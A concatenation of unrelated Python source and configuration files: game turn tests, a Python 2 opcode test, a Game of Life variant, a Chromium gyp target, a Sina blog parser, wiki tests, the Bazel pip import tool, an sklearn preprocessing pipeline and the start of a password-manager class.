kernel = worldmapc_kernel
xena.thirst = 100.0
xena.life_points = 1.0
kernel.server_db_session.add(xena)
kernel.server_db_session.commit()
# When
with unittest.mock.patch(
"rolling.util.is_there_resource_id_in_zone", retur_value=True
):
a = 1
turn_lib.execute_turn()
# Then
xena = kernel.character_lib.get_document(xena.id)
assert float(xena.life_points) == 1.05
assert float(xena.thirst) == 20.0
# This test depend on game1 config !
@pytest.mark.parametrize(
"before_lp,"
"before_hunger,"
"before_vegetal_food_quantity,"
"after_lp,"
"after_hunger,"
"after_vegetal_food_quantity",
[
(1.0, 0.0, 1.0, 1.05, 1.0, 1.0),
(1.0, 20.0, 1.0, 1.05, 20.0, 0.96),
(1.0, 90.0, 1.0, 1.05, 66.0, 0.0),
(1.0, 100.0, 0.04, 1.0, 99.0, 0.0),
(1.0, 100.0, 0.0, 0.9, 100.0, 0.0),
],
)
def test_eat__ok__eat_one_resource(
self,
worldmapc_kernel: Kernel,
turn_lib: TurnLib,
xena: CharacterDocument,
before_lp: float,
before_hunger: float,
before_vegetal_food_quantity: float,
after_lp: float,
after_hunger: float,
after_vegetal_food_quantity: float,
) -> None:
# With
kernel = worldmapc_kernel
if before_vegetal_food_quantity:
kernel.resource_lib.add_resource_to(
character_id=xena.id,
resource_id="VEGETAL_FOOD_FRESH",
quantity=before_vegetal_food_quantity,
)
xena.hunger = before_hunger
xena.life_points = before_lp
kernel.server_db_session.add(xena)
kernel.server_db_session.commit()
# When
turn_lib.execute_turn()
# Then
xena = kernel.character_lib.get_document(xena.id)
assert float(xena.life_points) == after_lp
assert xena.hunger == after_hunger
if after_vegetal_food_quantity == 0.0:
with pytest.raises(NoCarriedResource):
kernel.resource_lib.get_one_carried_by(
xena.id, resource_id="VEGETAL_FOOD_FRESH"
)
else:
resource = kernel.resource_lib.get_one_carried_by(
xena.id, resource_id="VEGETAL_FOOD_FRESH"
)
assert resource.quantity == after_vegetal_food_quantity
def test_eat__ok__eat_two_resource(
self, worldmapc_kernel: Kernel, turn_lib: TurnLib, xena: CharacterDocument
) -> None:
# With
kernel = worldmapc_kernel
kernel.resource_lib.add_resource_to(
character_id=xena.id, resource_id="VEGETAL_FOOD_FRESH", quantity=1.01
)
kernel.resource_lib.add_resource_to(
character_id=xena.id, resource_id="VEGETAL_FOOD_FRESH2", quantity=100.0
)
xena.hunger = 100.0
xena.life_points = 1.0
kernel.server_db_session.add(xena)
kernel.server_db_session.commit()
# When
turn_lib.execute_turn()
# Then
xena = kernel.character_lib.get_document(xena.id)
assert float(xena.life_points) == 1.05
assert round(xena.hunger, 1) == 19.8
with pytest.raises(NoCarriedResource):
kernel.resource_lib.get_one_carried_by(
xena.id, resource_id="VEGETAL_FOOD_FRESH"
)
r = kernel.resource_lib.get_one_carried_by(
xena.id, resource_id="VEGETAL_FOOD_FRESH2"
)
assert round(r.quantity, 1) == 97.8
def test_eat__ko__eat_resource_but_not_enough(
self, worldmapc_kernel: Kernel, turn_lib: TurnLib, xena: CharacterDocument
) -> None:
kernel = worldmapc_kernel
kernel.resource_lib.add_resource_to(
character_id=xena.id,
resource_id="VEGETAL_FOOD_FRESH",
quantity=0.5, # not enough
)
with unittest.mock.patch(
"rolling.server.effect.EffectManager.enable_effect"
) as fake_enable_effect:
turn_lib.execute_turn()
assert kernel.resource_lib.have_resource(
character_id=xena.id, resource_id="VEGETAL_FOOD_FRESH", quantity=0.46
)
assert not fake_enable_effect.called
def test_turn_build_consume_to_keep_on(
self, worldmapc_kernel: Kernel, turn_lib: TurnLib, build_a_on: BuildDocument
) -> None:
# Given
worldmapc_kernel.resource_lib.add_resource_to(
resource_id="BRANCHES", quantity=10.0, build_id=build_a_on.id
)
resources_on_build = worldmapc_kernel.resource_lib.get_stored_in_build(
build_id=build_a_on.id
)
assert resources_on_build
assert len(resources_on_build) == 1
assert resources_on_build[0].id == "BRANCHES"
assert resources_on_build[0].quantity == 10.0
assert build_a_on.is_on is True
# When
turn_lib.execute_turn()
# Then
build_a_on = worldmapc_kernel.build_lib.get_build_doc(build_a_on.id)
resources_on_build = worldmapc_kernel.resource_lib.get_stored_in_build(
build_id=build_a_on.id
)
assert resources_on_build
assert len(resources_on_build) == 1
assert resources_on_build[0].id == "BRANCHES"
assert resources_on_build[0].quantity == 9.99
assert build_a_on.is_on is True
def test_turn_build_consume_but_keep_off_because_not_enough(
self, worldmapc_kernel: Kernel, turn_lib: TurnLib, build_a_on: BuildDocument
):
# Given
worldmapc_kernel.resource_lib.add_resource_to(
resource_id="BRANCHES", quantity=0.001, build_id=build_a_on.id # not enough
)
resources_on_build = worldmapc_kernel.resource_lib.get_stored_in_build(
build_id=build_a_on.id
)
assert resources_on_build
assert len(resources_on_build) == 1
assert resources_on_build[0].id == "BRANCHES"
assert resources_on_build[0].quantity == 0.001
assert build_a_on.is_on is True
# When
turn_lib.execute_turn()
# Then
build_a_on = worldmapc_kernel.build_lib.get_build_doc(build_a_on.id)
resources_on_build = worldmapc_kernel.resource_lib.get_stored_in_build(
build_id=build_a_on.id
)
assert resources_on_build
assert len(resources_on_build) == 1
assert resources_on_build[0].id == "BRANCHES"
assert resources_on_build[0].quantity == 0.001
assert build_a_on.is_on is False
def test_turn_build_not_consume_because_off(
self, worldmapc_kernel: Kernel, turn_lib: TurnLib, build_a_off: BuildDocument
):
# Given
assert not worldmapc_kernel.resource_lib.get_stored_in_build(
build_id=build_a_off.id
)
# When
turn_lib.execute_turn()
# Then
assert build_a_off.is_on is False
def test_turn_build_grow_ploughed_lands(
self, worldmapc_kernel: Kernel, turn_lib: TurnLib
):
kernel = worldmapc_kernel
# Given
doc = kernel.build_lib.place_build(
world_row_i=1,
world_col_i=1,
zone_row_i=1,
zone_col_i=1,
build_id="PLOUGHED_LAND",
under_construction=False,
)
doc.seeded_with = "CEREAL"
kernel.server_db_session.add(doc)
kernel.server_db_session.commit()
assert doc.grow_progress == 0
# When
turn_lib.execute_turn()
doc = kernel.build_lib.get_build_doc(doc.id)
# Then 2
assert doc.grow_progress == 42
# When 2
turn_lib.execute_turn()
doc = kernel.build_lib.get_build_doc(doc.id)
assert doc.grow_progress == 42 * 2
def test_turn_clean_resources(self, worldmapc_kernel: Kernel, turn_lib: TurnLib):
# Given
worldmapc_kernel.resource_lib.add_resource_to(
resource_id="WOOD",
world_row_i=1,
world_col_i=1,
zone_row_i=1,
zone_col_i=1,
ground=True,
quantity=0.00000001,
)
# When
assert worldmapc_kernel.resource_lib.get_ground_resource(
world_row_i=1,
world_col_i=1,
zone_row_i=1,
zone_col_i=1,
)
turn_lib.execute_turn()
# Then
assert not worldmapc_kernel.resource_lib.get_ground_resource(
world_row_i=1,
world_col_i=1,
zone_row_i=1,
zone_col_i=1,
)
|
# Python test set -- part 2, opcodes
from test_support import *
print '2. Opcodes'
print 'XXX Not yet fully implemented'
print '2.1 try inside for loop'
n = 0
for i in range(10):
n = n+i
try: 1/0
except NameError: pass
except ZeroDivisionError: pass
except TypeError: pass
try: pass
except: pass
try: pass
finally: pass
n = n+i
if n != 90:
raise TestFailed, 'try inside for'
print '2.2 raise class exceptions'
class AClass: pass
class BClass(AClass): pass
class CClass: pass
class DClass(AClass):
def __init__(self, ignore):
pass
try: raise AClass()
except: pass
try: raise AClass()
except AClass: pass
try: raise BClass()
except AClass: pass
try: raise BClass()
except CClass: raise TestFailed
except: pass
a = AClass()
b = BClass()
try: raise AClass, b
except BClass, v:
if v != b: raise TestFailed, "v!=b"
else: raise TestFailed, "no exception"
try: raise b
except AClass, v:
if v != b: raise TestFailed, "v!=b AClass"
# not enough arguments
try: raise BClass, a
except TypeError: pass
try: raise DClass, a
except DClass, v:
if not isinstance(v, DClass):
raise TestFailed, "v not DClass"
print '2.3 comparing function objects'
f = eval('lambda: None')
g = eval('lambda: None')
if f == g: raise TestFailed, "functions should not be same"
f = eval('lambda a: a')
g = eval('lambda a: a')
if f == g: raise TestFailed, "functions should not be same"
f = eval('lambda a=1: a')
g = eval('lambda a=1: a')
if f == g: raise TestFailed, "functions should not be same"
f = eval('lambda: 0')
g = eval('lambda: 1')
if f == g: raise TestFailed
f = eval('lambda: None')
g = eval('lambda a: None')
if f == g: raise TestFailed
f = eval('lambda a: None')
g = eval('lambda b: None')
if f == g: raise TestFailed
f = eval('lambda a: None')
g = eval('lambda a=None: None')
if f == g: raise TestFailed
f = eval('lambda a=0: None')
g = eval('lambda a=1: None')
if f == g: raise TestFailed
|
#!/usr/bin/env python# life.py simulates John Conway's Game of Life with random initial states
# -----------------------------------------------------------------------------
import sys, random, pygame
from pygame.locals import *
# -----------------------------------------------------------------------------
# GLOBALS
# The title and version of this program
title, version = "The Game of Life", "1.0"
# The dimensions of each cell (in pixels)
cell_dimensions = (5,5)
# The framerate of the game (in milliseconds)
framerate = 1000
# The fraction of the board occupied by cells when randomly generated
occupancy = 0.33
# Colors used to represent the cells
colors = { 0:(0,0,0), 1:(200,0,0), 2:(0,200,0), 3:(0,0,200) }
# -----------------------------------------------------------------------------
# FUNCTIONS
# Main function
def main(args):
# Get the board dimensions (in cells, not pixels) from command-line input
if len(args) != 3: sys.exit("USAGE: life.py X_CELLS Y_CELLS")
board_dimensions = (int(args[1]),int(args[2]))
# Initialize pygame elements
screen, bg, clock = init(board_dimensions)
# Initialize random board
board, next_board = make_random_board(board_dimensions)
# Enter the game loop
quit_game = False
wave_count = 0
while not quit_game:
# Slow things down to match the framerate
clock.tick(framerate)
# Update the board
etat_cell0 = update_board(board, next_board)
if(etat_cell0): #etat_cell0 = 1 si la cellule n'a pas change
wave_count += 1
else :
print "Steps since last change :", wave_count
wave_count = 0
# Draw the board on the background
draw_board(board, bg)
# Blit bg to the screen, flip display buffers
screen.blit(bg, (0,0))
pygame.display.flip()
# Queue user input to catch QUIT signals
for e in pygame.event.get():
if e.type == QUIT: quit_game = True
# Print farewell message
print "Thanks for watching!"
# Initialize pygame elements
def init(board_dimensions):
# Grab hard-coded global values
global title, version, cell_dimensions
# Initialize the pygame modules
pygame.init()
# Determine and set the screen dimensions
dimensions = (board_dimensions[0]*cell_dimensions[0],
board_dimensions[1]*cell_dimensions[1])
screen = pygame.display.set_mode(dimensions)
# Set the title string of the root window
pygame.display.set_caption(title+" "+version)
# Grab the background surface of the screen
bg = screen.convert()
# Grab the game clock
clock = pygame.time.Clock()
# Return the screen, the background surface, and the game clock
return screen, bg, clock
# Create a "seed" board of given dimensions at random
def make_random_board(board_dimensions):
# Grab hard-coded global values
global occupancy
occ_div = 1
# Instantiate the board as a dictionary with a fraction occupied
# 0 indicates an empty cell; 1 indicates an occupied cell
board = dict()
for x in range(board_dimensions[0]):
for y in range(board_dimensions[1]):
nb_hasard = random.random()
if nb_hasard < (occupancy /occ_div) : board[(x,y)] = 1
elif nb_hasard < (2*occupancy/occ_div) : board[(x,y)] = 2
elif nb_hasard < (3*occupancy/occ_div) : board[(x,y)] = 3
else: board[(x,y)] = 0
next_board = dict()
for x in range(board_dimensions[0]):
for y in range(board_dimensions[1]):
next_board[(x,y)] = board[(x,y)]
# Return the board
return board, next_board
# Update the board according to the rules of the game
def update_board(board, next_board):
nb_sup = 2
# For every cell in the board...
for cell in board:
# How many occupied neighbors does this cell have?
score_type1, score_type2, score_type3 = count_neighbors(cell, board)
# If the cell is empty and has 3 neighbors, mark it for occupation
if board[cell] == 1:
if score_type3 > nb_sup :
next_board[cell] = 3
elif board[cell] == 2:
if score_type1 > nb_sup :
next_board[cell] = 1
elif board[cell] == 3:
if score_type2 > nb_sup :
next_board[cell] = 2
else :
max_score = max(score_type1, score_type2, score_type3)
if max_score > 5 :
if max_score == score_type1 :
next_board[cell] = 1
if max_score == score_type2 :
next_board[cell] = 2
if max_score == score_type3 :
next_board[cell] = 3
# Now, go through it again, making all the approved changes
etat_cell0 = (board[(0,0)] == next_board[(0,0)])
for cell in board:
board[cell] = next_board[cell]
return etat_cell0
# Return the number of occupied neighbors this cell has
def count_neighbors(cell, board):
# Figure out the potential neighboring cells (need to watch the edges)
neighbors = [ (cell[0]-1,cell[1]), (cell[0]-1,cell[1]-1),
(cell[0],cell[1]-1), (cell[0]+1,cell[1]-1),
(cell[0]+1,cell[1]), (cell[0]+1,cell[1]+1),
(cell[0],cell[1]+1), (cell[0]-1,cell[1]+1) ]
# For each potential neighbor, if the cell is occupied add one to the score
score_type1 = 0
score_type2 = 0
score_type3 = 0
for neighbor in neighbors:
# Is this a real neighbor, or is it out-of-bounds?
if neighbor in board.keys():
# Remember that neighbors which are marked for death count, too!
if board[neighbor] == 1: score_type1 += 1
if board[neighbor] == 2: score_type2 += 1
if board[neighbor] == 3: score_type3 += 1
# Return the score
return score_type1, score_type2, score_type3
# Draw the board on the background
def draw_board(board, bg):
# Grab hard-coded global values
global cell_dimensions
# Draw every cell in the board as a rectangle on the screen
for cell in board:
rectangle = (cell[0]*cell_dimensions[0],cell[1]*cell_dimensions[1],
cell_dimensions[0],cell_dimensions[1])
pygame.draw.rect(bg, colors[board[cell]], rectangle)
# -----------------------------------------------------------------------------
# The following code is executed upon command-line invocation
if __name__ == "__main__": main(sys.argv)
# -----------------------------------------------------------------------------
# EOF
__author__ = 'Dessalles'
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'includes': [
'modules_generated.gypi',
'../bindings/scripts/scripts.gypi',
'../build/features.gypi',
'../build/scripts/scripts.gypi',
],
'targets': [
{
# GN version: //third_party/WebKit/Source/modules:make_modules_generated
'target_name': 'make_modules_generated',
'type': 'none',
'hard_dependency': 1,
'dependencies': [
'../bindings/modules/generated.gyp:modules_event_generated',
'../config.gyp:config',
],
'actions': [
{
'action_name': 'IndexedDBNames',
'inputs': [
'<@(make_names_files)',
'indexeddb/IndexedDBNames.in',
],
'outputs': [
'<(blink_modules_output_dir)/IndexedDBNames.cpp',
'<(blink_modules_output_dir)/IndexedDBNames.h',
],
'action': [
'python',
'../build/scripts/make_names.py',
'indexeddb/IndexedDBNames.in',
'--output_dir',
'<(blink_modules_output_dir)',
],
},
],
},
],
}
|
# -*- coding: utf-8 -*-
from src.lib.SinaBlog_parser.tools.parser_tools import ParserTools
from src.tools.match import Match
from src.tools.debug import Debug
class SinaBlogArticle(ParserTools):
def __init__(self, dom=None):
if dom:
# Debug.logger.debug(u"SinaBlogArticle中,YESSSSSSSSSSSSSSSSSS")
pass
self.set_dom(dom)
self.info = {}
# self.body = self.dom.find('div', class_='SG_conn')
# if dom:
# self.body = dom.find('div', class_='SG_conn', id='module_920')
# if self.body:
# content = self.get_tag_content(self.body)
# self.content = BeautifulSoup(Match.fix_html(content), 'lxml')
return
def set_dom(self, dom):
if dom:
self.dom = dom
return
def get_info(self):
answer_info = self.parse_info()
return answer_info
def parse_info(self):
self.parse_author_id()
self.parse_author_name()
self.parse_article_id()
self.parse_article_title()
self.parse_answer_content() # 获得博文的内容
# self.parse_href()
# self.parse_comment() # TODO
# self.parse_publish_data() # TODO
return self.info
def parse_answer_content(self):
u"""
获得博文的内容
:return:
"""
article_body = self.dom.find('div', class_='articalContent')
# article_body = self.dom.find('div', class_='articalContent')
# article_body = self.dom.find('div', id='sina_keyword_ad_area2')
# article_body = self.dom.select('#sina_keyword_ad_area2')[0]
# article_body = self.dom.select('div.articalContent')
if not article_body:
Debug.logger.debug(u"博文内容没有找到")
return
article_body = str(article_body)
self.info['content'] = article_body
def parse_author_id(self): # TODO 这个部分可以不重复的
u"""
获得author_id
:return:
"""
author_id_href = False
author_id = self.dom.select('div.blognavInfo span a')
if author_id:
author_id_href = ParserTools.get_attr(author_id[1], 'href') # 因为creator_id[0]是首页的链接
if not author_id_href:
Debug.logger.debug(u"没有找到creator_id")
return
result = Match.SinaBlog_profile(author_id_href)
SinaBlog_id = result.group('SinaBlog_people_id')
self.info['author_id'] = SinaBlog_id
def parse_author_name(self):
u"""
获得author的姓名
:return:
"""
author_name = self.dom.select('div.info_nm span strong') # 获得creator_name
if not author_name:
Debug.logger.debug(u"没有找到博主姓名")
return
author_name = author_name[0].get_text().replace(' ', '').replace('\n', '').replace('\t', '').replace('\r', '')
self.info['author_name'] = author_name
def parse_article_id(self):
u"""
获得博文的id
:return:
"""
article_id = False
id = self.dom.select('div.artical h2')
if id:
article_id = ParserTools.get_attr(id[0], 'id')
if not article_id:
Debug.logger.debug(u"没有找到博文的id")
return
article_id = article_id[2:]
self.info['article_id'] = article_id
def parse_article_title(self):
u"""
获得博文的标题
:return:
"""
article_title = False
title = self.dom.select('div.articalTitle h2')
if title:
article_title = title[0].get_text()
if not article_title:
Debug.logger.debug(u"没有找到博文标题")
return
# 标题里如果出现&会出错, 应该有更好的做法
self.info['title'] = article_title.replace('&', '&').replace('<<', "《").replace('>>', "》")
|
from wiki import *
from traverse import *
def test_create_pages():
root_page = WikiPage(title="FrontPage", text="some text on the root page", tags={"foo", "bar"})
child_page = WikiPage(title="Child1", text="a child page", tags={"foo"})
root_page.add_child(child_page)
assert root_page.title == "FrontPage"
assert "Child1" in map(lambda x: x.title, root_page.children)
assert "FrontPage" in map(lambda x: x.title, child_page.parents)
def test_uri():
root_page = WikiPage(title="FrontPage", text="some text on the root page", tags={"foo", "bar"}, uri="/")
child_page = WikiPage(title="Child1", text="a child page", tags={"foo"})
root_page.add_child(child_page)
grandchild_page = WikiPage(title="Child2", text="a child page", tags={"foo"})
child_page.add_child(grandchild_page)
assert root_page.uri == "/"
assert child_page.uri == "/Child1"
assert grandchild_page.uri == "/Child1/Child2" |
# Global constants
# Dataset locations
IMDB_OSCD = "~/Datasets/OSCDDataset/"
IMDB_AIRCHANGE = "~/Datasets/SZTAKI_AirChange_Benchmark/"
# Template strings
CKP_LATEST = "checkpoint_latest.pth"
CKP_BEST = "model_best.pth"
CKP_COUNTED = "checkpoint_{e:03d}.pth"
|
# Copyright 2017 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The piptool module imports pip requirements into Bazel rules."""
import argparse
import atexit
import os
import pkgutil
# import pkg_resources
import shutil
import sys
import tempfile
import textwrap
# Note: We carefully import the following modules in a particular
# order, since these modules modify the import path and machinery.
import pkg_resources
if sys.version_info < (3, 0):
_WHL_LIBRARY_RULE = 'whl_library'
else:
_WHL_LIBRARY_RULE = 'whl3_library'
def _extract_packages(package_names):
"""Extract zipfile contents to disk and add to import path"""
# Set a safe extraction dir
extraction_tmpdir = tempfile.mkdtemp()
atexit.register(
lambda: shutil.rmtree(extraction_tmpdir, ignore_errors=True))
pkg_resources.set_extraction_path(extraction_tmpdir)
# Extract each package to disk
dirs_to_add = []
for package_name in package_names:
req = pkg_resources.Requirement.parse(package_name)
extraction_dir = pkg_resources.resource_filename(req, '')
dirs_to_add.append(extraction_dir)
# Add extracted directories to import path ahead of their zip file
# counterparts.
sys.path[0:0] = dirs_to_add
existing_pythonpath = os.environ.get('PYTHONPATH')
if existing_pythonpath:
dirs_to_add.extend(existing_pythonpath.split(':'))
os.environ['PYTHONPATH'] = ':'.join(dirs_to_add)
# Wheel, pip, and setuptools are much happier running from actual
# files on disk, rather than entries in a zipfile. Extract zipfile
# contents, add those contents to the path, then import them.
_extract_packages(['pip', 'setuptools', 'wheel'])
# Defeat pip's attempt to mangle sys.path
_SAVED_SYS_PATH = sys.path
sys.path = sys.path[:]
import pip # pylint: disable=C0413
sys.path = _SAVED_SYS_PATH
# import setuptools
# import wheel
def _pip_main(argv):
# Extract the certificates from the PAR following the example of get-pip.py
# https://github.com/pypa/get-pip/blob/430ba37776ae2ad89/template.py#L164-L168
cert_path = os.path.join(tempfile.mkdtemp(), "cacert.pem")
with open(cert_path, "wb") as cert:
cert.write(pkgutil.get_data("pip._vendor.requests", "cacert.pem"))
argv = ["--disable-pip-version-check", "--cert", cert_path] + argv
return pip.main(argv)
from rules_python.whl import Wheel # pylint: disable=C0413
def main():
args = _parse_args()
# https://github.com/pypa/pip/blob/9.0.1/pip/__init__.py#L209
if _pip_main(["wheel", "-w", args.directory, "-r", args.input]):
sys.exit(1)
# Enumerate the .whl files we downloaded.
def list_whl_files():
dir_ = args.directory + '/'
for root, unused_dirnames, filenames in os.walk(dir_):
for fname in filenames:
if fname.endswith('.whl'):
yield os.path.join(root, fname)
wheels = [Wheel(path) for path in list_whl_files()]
bzl_file_content = _make_bzl_file_content(
wheels=wheels,
reqs_repo_name=args.name,
input_requirements_file_path=args.input)
with open(args.output, 'w') as file_obj:
file_obj.write(bzl_file_content)
def _parse_args():
parser = argparse.ArgumentParser(
description='Import Python dependencies into Bazel.')
parser.add_argument(
'--name', action='store', help='The namespace of the import.')
parser.add_argument(
'--input', action='store', help='The requirements.txt file to import.')
parser.add_argument(
'--output',
action='store',
help='The requirements.bzl file to export.')
parser.add_argument(
'--directory',
action='store',
help='The directory into which to put .whl files.')
return parser.parse_args()
def _make_bzl_file_content(wheels, reqs_repo_name,
input_requirements_file_path):
wheel_to_extras = _make_wheel_to_extras(wheels)
join_str = ',\n '
pypi_name_to_py_library = join_str.join([
join_str.join([
'"{pypi_name}": "@{wheel_name}//:pkg"'.format(
pypi_name=wheel.distribution().lower(),
wheel_name=_make_wheel_name(reqs_repo_name, wheel))
] + [
# For every extra that is possible from this requirements.txt
'"{pypi_name}[{extra}]": "@{wheel_name}//:{extra}"'.format(
pypi_name=wheel.distribution().lower(),
extra=extra.lower(),
wheel_name=_make_wheel_name(reqs_repo_name, wheel))
for extra in wheel_to_extras.get(wheel, [])
]) for wheel in wheels
])
pypi_name_to_whl_filegroup = join_str.join([
join_str.join([
'"{pypi_name}": "@{wheel_name}//:whl"'.format(
pypi_name=wheel.distribution().lower(),
wheel_name=_make_wheel_name(reqs_repo_name, wheel))
] + [
# For every extra that is possible from this requirements.txt
'"{pypi_name}[{extra}]": "@{wheel_name}//:{extra}_whl"'.format(
pypi_name=wheel.distribution().lower(),
extra=extra.lower(),
wheel_name=_make_wheel_name(reqs_repo_name, wheel))
for extra in wheel_to_extras.get(wheel, [])
]) for wheel in wheels
])
merged_whl_repo_name = "{reqs_repo_name}_merged".format(
reqs_repo_name=reqs_repo_name)
merged_py_library = '"@{merged_whl_repo_name}//:pkg"'.format(
merged_whl_repo_name=merged_whl_repo_name)
merged_whl_filegroup = '"@{merged_whl_repo_name}//:whl"'.format(
merged_whl_repo_name=merged_whl_repo_name)
if wheels:
whl_library_rule_list = []
for wheel in wheels:
extras = ','.join(
['"%s"' % extra for extra in wheel_to_extras.get(wheel, [])])
whl_library_rule = _make_whl_library_rule(
reqs_repo_name=reqs_repo_name,
whl_repo_name=_make_wheel_name(reqs_repo_name, wheel),
wheels=[wheel],
extras=extras)
whl_library_rule_list.append(whl_library_rule)
whl_library_rules = '\n'.join(whl_library_rule_list)
merged_whl_library_rule = _make_whl_library_rule(
reqs_repo_name=reqs_repo_name,
whl_repo_name=merged_whl_repo_name,
wheels=wheels,
extras='')
else:
whl_library_rules = 'pass'
return _populate_bzl_template(
input_requirements_file_path=input_requirements_file_path,
whl_library_rules=whl_library_rules,
pypi_name_to_py_library=pypi_name_to_py_library,
pypi_name_to_whl_filegroup=pypi_name_to_whl_filegroup,
merged_whl_library_rule=merged_whl_library_rule,
merged_py_library=merged_py_library,
merged_whl_filegroup=merged_whl_filegroup)
def _make_wheel_to_extras(wheels):
"""Determines the list of possible "extras" for each .whl file.
The possibility of an extra is determined by looking at its
additional requirements, and determinine whether they are
satisfied by the complete list of available wheels.
Args:
wheels: a list of Wheel objects
Returns:
a dict that is keyed by the Wheel objects in wheels, and whose
values are lists of possible extras.
"""
pypi_name_to_wheel = {wheel.distribution(): wheel for wheel in wheels}
# TODO(mattmoor): Consider memoizing if this recursion ever becomes
# expensive enough to warrant it.
def is_possible(pypi_name, extra):
pypi_name = pypi_name.replace("-", "_")
# If we don't have the .whl at all, then this isn't possible.
if pypi_name not in pypi_name_to_wheel:
return False
wheel = pypi_name_to_wheel[pypi_name]
# If we have the .whl, and we don't need anything extra then
# we can satisfy this dependency.
if not extra:
return True
# If we do need something extra, then check the extra's
# dependencies to make sure they are fully satisfied.
for extra_dep in wheel.dependencies(extra=extra):
req = pkg_resources.Requirement.parse(extra_dep)
# Check that the dep and any extras are all possible.
if not is_possible(req.project_name, None):
return False
for extra_ in req.extras:
if not is_possible(req.project_name, extra_):
return False
# If all of the dependencies of the extra are satisfiable then
# it is possible to construct this dependency.
return True
return {
wheel: [
extra for extra in wheel.extras()
if is_possible(wheel.distribution(), extra)
]
for wheel in wheels
}
_WHL_LIBRARY_RULE_TEMPLATE = """
if "{whl_repo_name}" not in native.existing_rules():
{whl_library}(
name = "{whl_repo_name}",
whls = [{whls}],
requirements = "@{reqs_repo_name}//:requirements.bzl",
extras = [{extras}]
)"""
def _make_whl_library_rule(reqs_repo_name, whl_repo_name, wheels, extras):
whls = ', '.join([
'"@{name}//:{path}"'.format(
name=reqs_repo_name, path=wheel.basename()) for wheel in wheels
])
# Indentation here matters. whl_library must be within the scope
# of the function below. We also avoid reimporting an existing WHL.
return _WHL_LIBRARY_RULE_TEMPLATE.format(
whl_repo_name=whl_repo_name,
reqs_repo_name=reqs_repo_name,
extras=extras,
whl_library=_WHL_LIBRARY_RULE,
whls=whls)
_BZL_TEMPLATE = textwrap.dedent("""\
# Install pip requirements.
#
# Generated from {input}
load("@io_bazel_rules_python//python:whl.bzl", "{whl_library}")
def pip_install():
{whl_library_rules}
{merged_whl_library_rule}
_requirements = {{
{pypi_name_to_py_library}
}}
_whl_requirements = {{
{pypi_name_to_whl_filegroup}
}}
_merged_py_library = {merged_py_library}
_merged_whl_filegroup = {merged_whl_filegroup}
def pypi_requirements():
return _merged_py_library
def pypi_whl_requirements():
return _merged_whl_filegroup
def pypi_whl_requirement(name):
name_key = _make_name_key(name)
if name_key not in _whl_requirements:
fail("Could not find pip-provided whl dependency: '%s'; available: %s" % (name, sorted(_whl_requirements.keys())))
return _whl_requirements[name_key]
# Deprecated; don't use.
def requirement(name):
name_key = _make_name_key(name)
if name_key not in _requirements:
fail("Could not find pip-provided dependency: '%s'; available: %s" % (name, sorted(_requirements.keys())))
return _requirements[name_key]
def _make_name_key(name):
name_key = name.replace("-", "_").lower()
return name_key
""")
def _populate_bzl_template(input_requirements_file_path, whl_library_rules,
pypi_name_to_py_library, pypi_name_to_whl_filegroup,
merged_whl_library_rule, merged_py_library,
merged_whl_filegroup):
return _BZL_TEMPLATE.format(
input=input_requirements_file_path,
whl_library_rules=whl_library_rules,
pypi_name_to_py_library=pypi_name_to_py_library,
pypi_name_to_whl_filegroup=pypi_name_to_whl_filegroup,
whl_library=_WHL_LIBRARY_RULE,
merged_whl_library_rule=merged_whl_library_rule,
merged_py_library=merged_py_library,
merged_whl_filegroup=merged_whl_filegroup)
def _make_wheel_name(namespace, wheel):
return "{}_{}".format(namespace, wheel.repository_name())
if __name__ == '__main__':
main()
|
from loguru import logger
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import FunctionTransformer
from src.preprocessing_pipeline.transforms import (
set_df_index,
convert_to_str,
create_title_cat,
impute_age,
create_family_size,
drop_columns,
impute_missing_values,
scaler,
one_hot_encoder,
)
def create_preprocessing_pipeline(
pipeline_parameters: dict
):
"""
Description
-----------
Create a scikit learn pipeline to preprocess the data ready for modelling.
The pipeline uses a series of functions applied to the dataframe via
scikit-learn's FunctionTransformer class.
Each transformation step has a function assigned with the keyword arguments
applied through the supplied pipeline_parameters object.
Note that the pipeline works with pandas DataFrames over numpy arrays
because these are more interpretable and can be logged as artifacts.
Parameters
----------
pipeline_parameters: dict
Parameters containing the metadata associated with the pipeline
transformations.
Returns
-------
preprocessing_pipeline: sklearn.pipeline.Pipeline
The preprocessing pipeline
Raises:
-------
Exception: Exception
Generic exception for logging
Examples
--------
pipeline = create_pipeline(
("Step Description", FunctionTransformer(
func=my_func_name,
kw_args={"keyword_name" : "keyword_arg}
))
)
"""
try:
logger.info("Running create_preprocessing_pipeline()")
# Create the pre-processing pipeline
preprocessing_pipeline = Pipeline([
("Set dataframe index", FunctionTransformer(
func=set_df_index,
kw_args=pipeline_parameters["set_df_index_kw_args"]
)),
("Convert cols to string", FunctionTransformer(
func=convert_to_str,
kw_args=pipeline_parameters["convert_to_str_kw_args"]
)),
("Create title_cat column", FunctionTransformer(
func=create_title_cat,
kw_args=pipeline_parameters["create_title_cat_kw_args"]
)),
("Impute missing Age values", FunctionTransformer(
func=impute_age,
kw_args=pipeline_parameters["impute_age_kw_args"]
)),
("Create family_size column", FunctionTransformer(
func=create_family_size,
kw_args=pipeline_parameters["create_family_size_kw_args"]
)),
("Drop columns", FunctionTransformer(
func=drop_columns,
kw_args=pipeline_parameters["drop_columns_kw_args"]
)),
("Impute missing values", FunctionTransformer(
func=impute_missing_values,
kw_args=pipeline_parameters["impute_missing_values_kw_args"]
)),
("Scale numeric data", FunctionTransformer(
func=scaler,
kw_args=pipeline_parameters["scaler_kw_args"]
)),
("One hot encode categorical data", FunctionTransformer(
func=one_hot_encoder,
kw_args=pipeline_parameters["one_hot_kw_args"]
))
])
return preprocessing_pipeline
except Exception as e:
logger.exception("Exception in create_preprocessing_pipeline()")
logger.exception(e)
|
'''
1. Do the login
2. If the login is successful, use the working class
3. Else, no access allowed.
'''
import sqlite3
from .setup import fileName
from .Encryption import *
class Working:
def __init__(self, primaryPassword: str):
self.conn = sqlite3.connect(fileName)
self.cur = self.conn.cursor()
self.cur.execute("SELECT password FROM PrimaryPassword;")
